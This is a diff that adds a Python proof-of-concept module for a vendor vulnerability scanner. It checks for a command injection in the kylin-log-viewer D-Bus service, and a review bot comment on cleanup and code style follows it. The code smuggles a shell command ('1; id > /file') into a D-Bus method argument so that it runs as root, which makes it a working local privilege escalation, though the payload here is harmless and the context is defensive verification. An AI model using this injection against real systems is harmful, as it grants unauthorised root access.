diff --git a/pocs/kp_2022_0024_logfileprocess_command_injection.py b/pocs/kp_2022_0024_logfileprocess_command_injection.py
new file mode 100644
index 0000000000000000000000000000000000000000..21226a9ee3edd6f2779ea08ccfa1d649f5d0cefb
--- /dev/null
+++ b/pocs/kp_2022_0024_logfileprocess_command_injection.py
@@ -0,0 +1,84 @@
+from utils import highlight,tree,error
+from lib.core.basic import BasePoc
+import dbus
+
+POC_NAME = 'LogFileProcessCommandInjection'
+
+class LogFileProcessCommandInjection(BasePoc):
+ poc_info = {
+ # 尽量添加以下内容
+ 'poc': {
+ 'Id': 'kp_2022_0024', # poc编号,命名规范为kp_2022_0001_*.py
+ 'kve': "KVE-2022-0211", # kve id
+ 'ZenTaoID': "108070", # 禅道ID
+ 'Name': r'麒麟日志管理服务的redirection_logFileProcess方法存在命令注入漏洞', # poc名称
+ 'Author': 'shixinling', # poc作者
+ 'Create_date': '2022-03-22', # poc创建时间:如'2014-11-19'
+ },
+ 'vul': {
+ 'Product': 'kylin-log-viewer', # 漏洞所在产品名称
+ 'Version': r'低于3.1.12版本', # 产品的版本号
+ 'Type': r'命令注入', # 漏洞类型
+ 'Severity': 'High', # Bug severity
+ 'Description': r'com.kylin.logview.redirection_logFileProcess方法存在命令注入,可直接导致本地权限提升', # 漏洞介绍
+ 'DisclosureDate': '2022-02-28', # poc公布时间:如'2014-11-19'
+ 'ZenTaoURL':'暂不公开', #禅道链接
+ 'RepairSolution':r'目前此漏洞已经推出离线补丁包,补丁包下载地址为:http://dev.kylinos.cn:8004/files/kylin-log-viewer/SP1_SP2/,或待该离线补丁包被推送至外网源后,使用apt upgrade kylin-log-viewer完成更新。', #修复方案
+ }
+ }
+
+ scan_info = {
+ 'Target': '',
+ 'TaskId': '',
+ 'Mode': 'verify', # verify或exploit, 默认值为verify
+ 'Verbose': False, # 是否打印详细信息,默认值为False
+ 'Error': '', # 记录poc失败信息
+ 'Success': False, # 是否执行成功,默认值为False表示poc执行不成功,若成功请更新该值为True
+ 'Ret': tree() # 记录额外的poc相关信息
+ }
+
+ test_case = {
+ 'Need_fb': False,
+ 'Vuln': [], # 列表格式的测试版本
+ 'Not_vuln': [], # 同上
+ }
+
+ def verify(self, first=False):
+ # 漏洞验证方法(mode=verify)
+ target = self.scan_info.get("Target", "") # 获取测试目标
+ verbose = self.scan_info.get("Verbose", False) # 是否打印详细信息
+ flag_str = '' #漏洞成立时的特征字符串
+ flag_list = [] #漏洞成立时的特征列表
+
+ # 以下是PoC的检测逻辑
+ print('testing if {} vulnerability'.format(self.poc_info["poc"]["Name"]))
+ FileName = self.get_random_str(8) + '.txt'
+ service = 'com.kylin.logview'
+ path = '/logfile'
+ interface = 'com.kylin.logview'
+ try:
+ bus = dbus.SystemBus()
+ obj = bus.get_object(service, path)
+ proxy = dbus.Interface(obj, interface)
+ cmd = "id > /{};".format(FileName)
+ proxy.redirection_logFileProcess(('a', 'b', 0, 'c', f'1; {cmd}', 1), signature='(ssissi)')
+ file_object = open('/{}'.format(FileName))
+ flag_str = file_object.read()
+ file_object.close()
+ # 下是PoC的判断逻辑
+ if "uid=0(root)" in flag_str or "groups=0" in flag_str:
+ msg = r'本机 ( {} ) 存在 {} (禅道ID : {} ) 。 漏洞描述 : {} '.format(self.scan_info['Target'],self.poc_info["poc"]["Name"],self.poc_info["poc"]["ZenTaoID"],self.poc_info["vul"]["Description"])
+ print(msg)
+ cmd = "rm /{};".format(FileName)
+ proxy.redirection_logFileProcess(('a', 'b', 0, 'c', f'1; {cmd}', 1), signature='(ssissi)')
+ self.scan_info['Success'] = True # 漏洞存在,必须将该字段更新为True(必须)
+ self.scan_info['Ret']['VerifyInfo']['Target'] = 'localhost' # 记录漏洞相关的一些额外信息(可选)
+ self.scan_info['Ret']['VerifyInfo']['DATA'] = msg
+ if verbose:
+ highlight('[*] {} vul found'.format(self.poc_info["poc"]["Name"])) # 打印高亮信息发现漏洞,其他可用方法包括info()/warn()/error()/highlight()方法分别打印不同等级的信息
+ except Exception as e:
+ error('[*] {} vul running error : {}'.format(self.poc_info["poc"]["Name"],str(e)))
+
+ def exploit(self, first=False):
+ # 漏洞利用方法(mode=verify)
+ self.verify(first=first)
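Review bot: The marker file written to `/{FileName}` is removed only inside the `uid=0(root)` branch of `verify`, so a run in which the service wrote the file but the check did not match, or in which `open()`/`read()` raised, leaves an artifact owned by the service at the filesystem root, and the `open()` has no `with`, so an exception in `read()` also leaks the handle. Read the marker with `with open('/{}'.format(FileName)) as file_object: flag_str = file_object.read()` and move the existing cleanup call into a `finally:` clause that runs whenever the marker exists rather than only on success. `target` and `flag_list` are assigned but never read, and the comment on `exploit` says `(mode=verify)` where `(mode=exploit)` is meant. The hunk's indentation is collapsed in this rendering, so the nesting of the `if verbose:` block under the `if` above it is inferred rather than visible.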